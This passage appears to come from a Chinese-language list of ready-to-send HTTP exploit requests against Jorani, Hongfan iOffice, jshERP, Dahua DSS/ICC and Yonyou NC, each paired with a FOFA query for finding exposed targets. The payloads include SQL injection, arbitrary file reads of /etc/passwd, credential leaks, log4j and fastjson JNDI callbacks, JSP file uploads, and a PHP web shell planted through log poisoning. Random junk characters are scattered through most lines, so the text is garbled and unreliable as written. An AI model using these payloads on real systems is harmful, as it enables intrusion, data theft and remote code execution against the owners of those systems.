GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
7 [% j( V5 @6 C" Q' h7 F5 n* oHost: 127.0.0.1
2 Q9 O5 n0 `& N7 b' yPragma: no-cache7 W' Q; K6 f# u% K: ?$ v5 ^9 T
Cache-Control: no-cache
$ s. ]. t- [$ TUpgrade-Insecure-Requests: 1
* l) m1 \0 ?8 N3 S$ b. z" v* p6 u. VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
8 {; m6 {: o" ], J- s4 \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. z, ~0 K9 q( G& q/ sAccept-Encoding: gzip, deflate
; Z6 C2 U: [* m. J" XAccept-Language: zh-CN,zh;q=0.9,en;q=0.87 h- u# T" C2 ~7 S" e' B
Connection: close5 F, h6 Q1 a9 ~3 b2 w
/ j' c6 q+ e/ ^6 H! d4 c# t* f% w$ {8 z; W+ X
12. Jorani < 1.0.2 远程命令执行
* v0 P# B$ M& L2 L- t; d# iFOFA:title="Jorani"4 G, r9 f6 a9 _8 C8 g, f' }0 x7 g( w
第一步先拿到cookie
3 T2 T2 A+ n! E- ?8 [! rGET /session/login HTTP/1.1
2 P& F. y: O1 a1 M8 IHost: 192.168.190.30
$ f, D( _- }* q! FUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 J+ c8 f+ v+ L+ [
Connection: close
! t! k& }' N3 @' E( s- qAccept-Encoding: gzip
- b1 g. h" D) G" P% m
$ R0 ^; w! {/ H+ [0 V4 J7 i8 |; c# X. ]1 }! M8 {* w, `4 u- w; h
响应中csrf_cookie_jorani用于后续请求" T8 j- Q: `, z. e j+ t- o
HTTP/1.1 200 OK- K% r1 c; h0 B( d. I; }5 S
Connection: close
4 s5 E% B0 O& T3 \9 w" q6 ?7 yCache-Control: no-store, no-cache, must-revalidate1 B o. z8 _7 x" L/ \* B
Content-Type: text/html; charset=UTF-8
1 A3 S; X' S9 q! p5 k+ b# oDate: Tue, 24 Oct 2023 09:34:28 GMT8 ~" u; G2 @. P& t
Expires: Thu, 19 Nov 1981 08:52:00 GMT
6 y" s2 u) j; z+ {5 m2 l" j* dLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT: s l+ i. L6 N/ @4 t# o: x
Pragma: no-cache
) j1 o% E/ f9 w/ J% I+ E5 E* F) QServer: Apache/2.4.54 (Debian)
# d0 _& A- n' S! I" S* @Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/) { Z% I2 @- \$ F3 {
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly4 V# v) }/ v! r# g7 P
Vary: Accept-Encoding7 f" m0 g' v3 C3 |* X/ O3 _
4 z+ Z( d; D7 J' g ~$ I D# `# C" K/ R
POST请求,执行函数并进行base64编码
& D* ?9 R9 q9 `" g7 ^( Y$ e; W0 fPOST /session/login HTTP/1.1
* l& y$ Z g' I, I' eHost: 192.168.190.30
' r7 H; Y$ [! d0 M1 z* \0 y( LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.367 t5 }0 m `3 |
Connection: close% d- [- e, _3 ^+ i8 R
Content-Length: 252+ U) \5 v: {6 x; {2 S
Content-Type: application/x-www-form-urlencoded
0 j, x2 D4 X: {8 c: h7 i; m# N) xCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
" Q+ m0 i( ~+ B. }+ UAccept-Encoding: gzip
9 I, N: ?& i( `; K/ p( z& l6 U
5 |6 Z( T! _( P( r$ ~ v" Jcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
; X' f0 ~' a" D1 G1 A, o7 q' [7 ^) E Y8 L" W
$ Q3 R& H7 O5 r6 ]( b! i$ @" ?
1 I; B% _* r2 b O$ b* ^( U& g向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
4 F9 I7 d/ d& O/ p/ U4 n, [GET /pages/view/log-2023-10-24 HTTP/1.1
: R C: b) a) \6 l/ HHost: 192.168.190.30( Y% R. N4 t9 L9 j3 m; m" T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.360 d+ R' [8 x; {4 d; k
Connection: close
( U3 t6 I- }6 [) w9 X( h$ [Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r: v8 S3 g% i: C7 E0 Z8 @4 E
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
6 V" i% d( { f ZX-REQUESTED-WITH: XMLHttpRequest
0 |- E' B1 U: x* d) H1 dAccept-Encoding: gzip, j& v2 t' X# {$ H
: k' ]7 h9 q; _+ a( V' ]$ L/ d$ @- Z% X! Z: B8 ^& A
13. 红帆iOffice ioFileDown任意文件读取
* P I% K/ _* c4 }! uFOFA:app="红帆-ioffice"' o( M1 h1 l% V8 H) S
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
! a$ ?: m/ d) uHost: x.x.x.x
* ^( _# y U5 y% e2 VUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
6 I* ]6 H3 F7 L' ]2 m4 W. \, W* ]Connection: close
# l( ?4 D$ g0 x0 V$ ^$ \Accept: */*
7 P/ J3 ]; M! e0 [4 ?Accept-Encoding: gzip1 M2 o5 F/ d5 h1 t% i" w
+ w8 l- i9 Q5 F* |- \- G6 l
+ x- J& E0 V/ z- R ? h9 A1 C
14. 华夏ERP(jshERP)敏感信息泄露, o( B w: w7 D8 d5 _$ g a
FOFA:body="jshERP-boot"
" J2 L, C8 T" N' w, E/ g泄露内容包括用户名密码# z, ?' n; M, V% S/ {
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1 E% c" w. O: L# r% @7 n6 i4 R! V
Host: x.x.x.x% F9 b' H% m& r- d' b6 u2 H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.365 i) @( K* X- {% F; x9 F7 c3 \# v
Connection: close
0 M: U. \4 V1 s) a" o8 h$ |Accept: */* G9 V8 ~1 E' O$ H
Accept-Language: en
Q/ P6 a( f0 O& Y1 dAccept-Encoding: gzip
) z% u9 I( H z9 M" \. D) `+ ~
, b& Y T; @1 U8 n5 Z- a; j$ J5 ]2 P
15. 华夏ERP getAllList信息泄露' x/ S: p6 u- j& |7 H0 b
CVE-2024-0490' W/ q3 P% k# H+ c9 \+ q
FOFA:body="jshERP-boot"
: t/ U- E. Q }% Q' ^泄露内容包括用户名密码
6 D3 w& E: E& D! m. iGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1, n! G6 T+ g% d3 P1 z
Host: 192.168.40.130:1005 f' O2 T6 C g; y2 E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
: F+ p# Q4 e% @ C! pConnection: close
2 W, Z8 s; _3 [" h( o! v- nAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
/ N1 |# K/ D, MAccept-Language: en/ n" I( m: E3 r
sec-ch-ua-platform: Windows+ t+ V% n ^& ~) d
Accept-Encoding: gzip
2 U3 |, U# r" Z5 }
5 s% |9 y$ R8 F# {
- k0 v% p# W2 _# w) @16. 红帆HFOffice医微云SQL注入 t, c u |# g. J" Y( f, P3 T: X
FOFA:title="HFOffice"
7 O* S- i0 I) f, \poc中调用函数计算1234的md5值
8 N2 {& j/ I$ @ F: z: R$ o; RGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
5 K9 T' G% `3 o" fHost: x.x.x.x* a5 l1 [: h( a1 Z
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.364 z* _" g7 |! C: N$ i* |8 x; e5 z$ T1 Y* o
Connection: close/ ~% N; p) z/ E# X/ R/ W+ v
Accept: */*
+ e; ^; P- D' y% S' iAccept-Language: en
+ h4 r$ O* D% R+ P5 sAccept-Encoding: gzip0 H) ]5 T9 P$ m# y/ h
& n1 [' R% }( B1 @9 M) { w7 \5 F& s& e$ w( z% r; ^- `
17. 大华 DSS itcBulletin SQL 注入0 r0 |. a! M7 f5 x; D! _2 A
FOFA:app="dahua-DSS"
9 }; E9 Y3 O. b9 ]POST /portal/services/itcBulletin?wsdl HTTP/1.17 a7 \3 E. R: H& T; D7 `6 D I
Host: x.x.x.x1 ^3 J% s% _2 Q3 `* J8 ]5 o7 y; p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# f1 H" j _: R; ~! GConnection: close$ E' {, C* H" t
Content-Length: 345; o; N" M* `5 ~! k3 L$ o
Accept-Encoding: gzip
: f1 f( c( m: ~2 M6 ?1 F( r) i- t& R5 U" L+ z6 A
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
& x4 U# s' C5 I6 W5 S; ^. [: [/ i<s11:Body>
8 A. P& k0 p' f* v- I1 C9 L$ ] <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
3 T3 A5 o" {7 E, u4 i+ R; a7 {: A <netMarkings>
8 s. M4 l; {1 ]3 B- Z' x (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
* H0 {3 Y+ R2 K8 s* a </netMarkings>
* L& u- ~5 a! N! L6 O8 a# a </ns1:deleteBulletin>7 D( [4 i. N" N) M9 c+ A
</s11:Body>
% t* R6 ~3 \7 X6 l</s11:Envelope>
; s3 w0 Q) C2 k+ O2 _: V2 `1 v6 {6 o
" J' p8 d0 [9 W/ a; R5 Y6 f
; p( B4 Q- G W A5 P18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
4 J$ [7 Y8 k% P1 O( F" f! sFOFA:app="dahua-DSS"
; n! g3 o9 L8 ~% F/ IGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
/ i) @0 A0 @. F+ {' aHost: your-ip
6 z; g! J. Q' n' b) E4 rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 |* u- v* m4 ]% O* w/ v! F [Accept-Encoding: gzip, deflate
( F( Q! V2 }4 W4 ]% v; o* E V, @Accept: */*5 g8 I5 [0 z p5 R
Connection: keep-alive
# g$ M6 P2 n/ O# l) @9 |' g, R: g
+ q- G2 u7 [5 L- M6 ^/ H) r9 S" J
$ u- v2 m- D: ~1 U% K) \; z7 X19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
- e; X9 Q2 P/ |0 L5 X! {. y w- qFOFA:app="dahua-DSS"
: \& |. H& W R8 Z* M4 tGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
, m: M- Y+ y) Y" X' A+ C& qHost:3 e+ G& H' I" C' I- |* m$ Y4 j
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36* \5 N m/ a% Q7 W, I G: V3 p
Accept-Encoding: gzip, deflate6 T( T9 D: y! d3 S* k% ^
Accept: */*
4 k/ K! |# {- cConnection: keep-alive' u( E5 w1 d2 x
. D r9 _. z, Z3 u* s& K- N# g- y. R& o; N& e1 s$ W& A
20. 大华ICC智能物联综合管理平台任意文件读取7 i& J, f7 m$ b) l8 |$ B0 M, [
FOFA:body="*客户端会小于800*"
& J3 O: ]2 w( D' P$ mGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
' F( q6 ?3 a; B2 hHost: x.x.x.x0 a/ s% `: N9 o/ U! Q
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
; _( p/ q& m: w! }Connection: close: F' j$ o7 D" }" X
Accept: */*0 t7 T4 r1 s' `* K. M
Accept-Language: en, b% ]! K1 M" R
Accept-Encoding: gzip
9 A3 k1 E( ]4 J# o& d1 t
- l2 g) D: J+ C, }( m" F3 l4 p% v) J
21. 大华ICC智能物联综合管理平台random远程代码执行
* V3 K( v! _% y2 d' I' @( HFOFA:icon_hash="-1935899595"% i# M) m. p# p) K& x! [4 C5 L* u
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
" t( _7 N0 s6 sHost: x.x.x.x
1 b2 i( h! P8 tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 z/ K- h( N/ u. \. M5 ~7 v$ A. ], GContent-Length: 161
( \" _9 F" e3 V+ y7 r, EAccept-Encoding: gzip- ]# L, A' u2 @
Connection: close6 w! S8 Z9 s; s& }8 k `
Content-Type: application/json;charset=utf-8
7 f: W8 i0 z5 }. a$ V4 k+ g8 J% E, F6 N$ ]' c$ h
{
6 ] l) w2 ~) b" V"a":{
% n. b ?, b/ o) A "@type":"com.alibaba.fastjson.JSONObject",
6 ~2 Z" S5 J2 i" r- A {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}9 t$ i8 t% `6 r. P& \
}""$ r1 F; Q/ Q+ E, ? F$ G" L& L' R
}
0 X2 n2 P( Y, s/ n" Y$ o3 ~
' p+ w7 y) c- I" B2 o' `% I5 R* }( i$ [' L6 b2 a
22. 大华ICC智能物联综合管理平台 log4j远程代码执行, a: f# T' P% v I
FOFA:icon_hash="-1935899595"
$ i3 |! y/ v4 C0 Q8 S3 PPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
0 x% S' I' @6 OHost: your-ip+ \! w% S' @7 C4 h+ J1 s3 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
; A2 _4 q1 B$ ^6 R# Z) {/ XContent-Type: application/json;charset=utf-8+ ?. l2 |2 F2 I$ l8 e6 c* b8 G( U
) Z- ]* H8 X5 Y' U7 M{1 p" K0 U4 b2 l0 j" p3 K
"loginName":"${jndi:ldap://dnslog}"2 A: l* q; F, L0 v
}
7 m9 D9 Z' i0 g1 W5 `( k6 e$ c( v h' M) E9 z/ ]: a
8 W6 H$ I# `, W
9 a8 i/ @ `( X& x% ]! k23. 大华ICC智能物联综合管理平台 fastjson远程代码执行& I6 h1 d/ x( b6 L
FOFA:icon_hash="-1935899595"; v) e3 c* I3 r/ j- @
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
1 {% v6 y, o' L6 OHost: your-ip8 ]. Q, p3 I6 ]7 ~$ ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; b- U5 N4 G, d4 x0 M' u8 k
Content-Type: application/json;charset=utf-8
% V1 _2 D4 C0 B3 V/ FAccept-Encoding: gzip. ?- x$ E0 w% N5 u3 |. P
Connection: close
7 I- g, `7 G+ P% [! `& A: h$ ^. `$ p* \
{6 [5 a: C1 B& |$ a
"a":{
; v$ d* [9 v) v$ H4 H "@type":"com.alibaba.fastjson.JSONObject",
+ [2 p6 [" z9 |* i; i6 e {"@type":"java.net.URL","val":"http://DNSLOG"}. i5 i$ A9 |: K" q. _, v/ a
}""
+ k2 ?0 \0 |3 O5 ]3 e& [}6 G7 F; N& _) \6 q
" e e6 _/ X! [+ c6 A
0 T8 U$ v+ a, R5 L
24. 用友NC 6.5 accept.jsp任意文件上传
8 E0 C4 i0 G% Z. A, WFOFA:icon_hash="1085941792"* x# l- e. A5 R! k& ^
POST /aim/equipmap/accept.jsp HTTP/1.1! E2 E8 Y6 |7 V& d+ l4 b
Host: x.x.x.x C0 R4 ~, A2 b+ i7 _9 @1 l6 x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36' B; ~. n% e# h: R( t
Connection: close
( o3 j6 G& a5 A" s+ s+ g; |4 z5 cContent-Length: 449. @7 |" [6 D# B" z1 s! a4 C
Accept: */*
% l) A, q6 k! [# N k" R6 X. mAccept-Encoding: gzip$ p) u8 @5 ^9 e; n; F
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc1 L: g: R# B) a/ s5 v; k1 h4 M5 g
) Z: o: i7 U) D, s
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc1 o* F% w) d2 f' ]) M1 ?4 C
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"0 v' @* Z6 j9 F, ~8 \
Content-Type: text/plain
* o8 U3 B% a' |" @
9 F( e. N9 f; E* k2 P( \<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>5 Z% b. F5 f- C6 h
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc. n2 f+ t+ K7 v
Content-Disposition: form-data; name="fname"
& T: O: m! ]( b7 c7 ]" v4 M* g5 l, E! s
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp2 R) B( }; r/ Q4 \6 `( \
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--* B/ U2 h5 G: c7 t8 H! M
5 H a- d/ J% b1 U2 z F2 p
! t1 D# k% W6 x ]: ~, U1 v5 h) c25. 用友NC registerServlet JNDI 远程代码执行
$ I3 ^' N0 Q ]6 KFOFA:app="用友-UFIDA-NC": n' A. r V7 ^% I4 l
POST /portal/registerServlet HTTP/1.1
( h6 z+ |* G* H& g, y+ q) nHost: your-ip
+ }0 ~) Z* f, e- L, a: S( n( ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
4 Z* I# {. {2 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
3 b3 v t8 ~. T7 K! p( XAccept-Encoding: gzip, deflate
4 D, f; M4 C* K+ r0 \9 K0 `- D, IAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
0 v% a; v" ^! e' m" v" h2 ]Content-Type: application/x-www-form-urlencoded
( k k7 H( P$ i- y% m7 s
, }/ W( S( t4 n3 N. qtype=1&dsname=ldap://dnslog" o' P7 b7 R* `- G! I7 z/ s
8 I# ]2 I0 `; c3 }: p, o) P8 U7 w D; M8 ^
& J5 n+ B5 y* Q
26. 用友NC linkVoucher SQL注入
; ]( v* T" O7 u: P+ f$ hFOFA:app="用友-UFIDA-NC"4 r# G) C: H* m
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1+ O9 h5 k( g9 X; L* n6 Z5 [
Host: your-ip( y# v1 A9 {2 i0 b8 y' y1 i: _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, M8 B& a. F; `, rContent-Type: application/x-www-form-urlencoded
! y9 A1 t* S% ] o3 T$ `) xAccept-Encoding: gzip, deflate
" Q7 n3 l2 l! B3 m- \1 I4 V+ WAccept: */*
9 w& s' F+ ~, F4 I- C% \Connection: keep-alive+ ^+ ?/ D3 L9 G7 `8 n1 [/ L0 H
; k. m2 q1 O+ u4 X6 o( \
( \ v% o+ L8 G" K. L1 M- k27. 用友 NC showcontent SQL注入
* m' s. a- C5 \4 J6 TFOFA:icon_hash="1085941792"
1 {/ c2 ^+ _- g" N8 b" u0 t0 nGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1; p- ^2 B# L; @) t3 P' h. l
Host: your-ip
6 D: q! h \0 |8 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' A4 M5 f& I4 L( h! a2 {4 d8 z5 R
Accept-Encoding: identity0 h6 ?8 e; C7 }, }' n2 L @
Connection: close
3 U2 k( e' F) S8 PContent-Type: text/xml; charset=utf-8
$ D' I$ L, y) Q$ ^$ g
6 j7 h( h7 ]- h+ I# G+ ^4 G$ Q2 N) Y! p
28. 用友NC grouptemplet 任意文件上传" O# y- W$ H6 F4 }
FOFA:icon_hash="1085941792"
6 J9 Y. G* Q: X5 rPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1/ q8 O n: {) D
Host: x.x.x.x; g% l1 |' W3 S% o: k3 O/ I4 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36# x: M: q% G5 I8 S. j
Connection: close" T2 Z$ ^, R. A4 _- R+ q* U9 Y
Content-Length: 268. G8 ^6 g; @ O0 O
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk/ s/ e* V9 @3 i Q: `! `" x- R* Q
Accept-Encoding: gzip
5 ?1 u# S c' C7 G0 z8 r s
% ?6 w$ M9 x) B& b1 C------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk, u1 b' U8 T" U/ B. [
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"# `0 I+ q7 d+ b1 h$ R
Content-Type: application/octet-stream2 j+ u# ~% y) S
7 U, ?9 C' K1 _7 Q9 I9 K<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>5 S2 l9 a9 b2 }3 M' k
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
2 [/ W$ U( d, [- i; b
2 I% K. U O4 v
2 S, o. j9 m O' G: v/uapim/static/pages/nc/head.jsp8 r/ }/ y5 R3 F3 @/ {4 a1 H; h4 r
4 ^. P9 M, z. e) U
29. 用友NC down/bill SQL注入1 H5 f# Z; L: q% v) v- j" H
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"( I0 o7 W8 I% n; Q: ~' V2 X7 Q
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1: {9 x) F! F* W0 N& N2 R
Host: your-ip: d) ~* r+ C+ C+ i/ Q( M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 Q6 O. L# e1 e0 x% e; l" W5 X
Content-Type: application/x-www-form-urlencoded
& o5 x6 M3 P" F$ ]- S. WAccept-Encoding: gzip, deflate3 }: j1 |" y* g) u2 d
Accept: */*
' r/ i( c5 P$ [7 F$ t# y vConnection: keep-alive
! l( E8 g5 X4 K+ }. G h* K
L9 k' u* L: u& X0 H; C% Y
# a/ H6 t8 |) _8 o" \- J! b3 G$ Z; [30. 用友NC importPml SQL注入
: G& q4 X$ f' ~* k8 z" yFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
/ m# h1 X+ K. iPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1) {2 B$ X n w, I0 Z- M$ ?
Host: your-ip4 S, K/ G D k3 g' Q& m: M* N" Q
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V: l- O M0 I+ `$ L+ [" A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
3 n& p* {8 {3 _, DConnection: close
. O) C+ E. r# M- n B4 n$ \. B) ]# f! I6 x: B2 U
------WebKitFormBoundaryH970hbttBhoCyj9V
' e& z8 O" Z, e$ R+ {0 ~' E2 JContent-Disposition: form-data; name="Filedata"; filename="1.jpg"; {# Z4 F% j, e, u
Content-Type: image/jpeg
( v1 _* v: \4 H( R' v------WebKitFormBoundaryH970hbttBhoCyj9V--
: h0 k7 p' B4 M7 j* d$ T5 z5 X. E
- ^% S& g% L" k' _* a! l6 m5 G B7 Z l
31. 用友NC runStateServlet SQL注入
( V7 h0 Y5 w% j4 }* Uversion<=6.5
6 o2 a" K% ], k) K" ]) `FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
9 |% r! f6 n4 N7 @. f, ?5 a5 d% i6 p4 tGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1; e. _" ]: B1 P: c3 B
Host: host+ W2 K. b; R. j8 ~* f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
/ j: K. A2 O5 ]: bContent-Type: application/x-www-form-urlencoded5 j0 x. H, J' x9 N( R* c {/ E2 c
+ a+ f4 @1 q2 b9 R3 P: Z3 L/ x. X, @& S' v+ F
32. 用友NC complainbilldetail SQL注入
0 t+ k6 b1 e$ `version= NC633、NC65
4 X: V6 J5 P O/ S. u1 B( YFOFA:app="用友-UFIDA-NC"
$ j: h) h3 X) YGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.16 q; Q. M8 D7 @( u) p/ @2 l8 Z' l
Host: your-ip4 q. V/ H) G8 W$ U/ L7 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- X# g" L+ A! S7 z8 {Content-Type: application/x-www-form-urlencoded
; B* V- ]7 I" l3 hAccept-Encoding: gzip, deflate* g: ?' W. y$ \9 @% u& h* m
Accept: */*
4 w) x1 M" Q9 XConnection: keep-alive
) f, I; y, Z# p8 r1 @/ a% Q
- g; e z7 p4 e& H% R: b5 K+ o4 u, M0 U$ I/ k! e9 @. ]
33. 用友NC downTax/download SQL注入* O# Z0 y. I% }# z' l' M
version:NC6.5FOFA:app="用友-UFIDA-NC"
_- B' H4 A$ g) m1 }% IGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
+ R! \! p, f. @0 c' Y) e+ cHost: your-ip) d+ b) m/ }# y, Y+ n, c$ L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- z( P8 G4 t" n. m, G& g& |Content-Type: application/x-www-form-urlencoded& h8 N5 z6 l& W5 ~: Z4 |7 d
Accept-Encoding: gzip, deflate; r; M( E# C& W: Z" [
Accept: */*
$ i! z* g0 E& f( W* u+ ^Connection: keep-alive
9 E7 K6 q5 {1 V2 J% J. j) b y9 F7 s ?/ O- ?
8 S9 p- B! D: l, F5 x34. 用友NC warningDetailInfo接口SQL注入) S8 y: I Y, _8 O7 R* F
FOFA:app="用友-UFIDA-NC"' x8 L# n$ O& [
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.18 G+ f- B2 V0 |' Y( K' u$ u/ f
Host: your-ip+ X0 X4 G/ P$ F' c. H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- r, F' x& x' @4 g# _ t" Z
Content-Type: application/x-www-form-urlencoded, X) W- J$ t8 A
Accept-Encoding: gzip, deflate% j# E4 F: X+ q3 l3 ^, U
Accept: */*
7 C8 F. X: }- sConnection: keep-alive
$ F) h! Z% _/ P% Y ]+ L
/ H0 k5 B8 h2 @; q" s7 x5 |, l
) g C$ l+ G: a35. 用友NC-Cloud importhttpscer任意文件上传
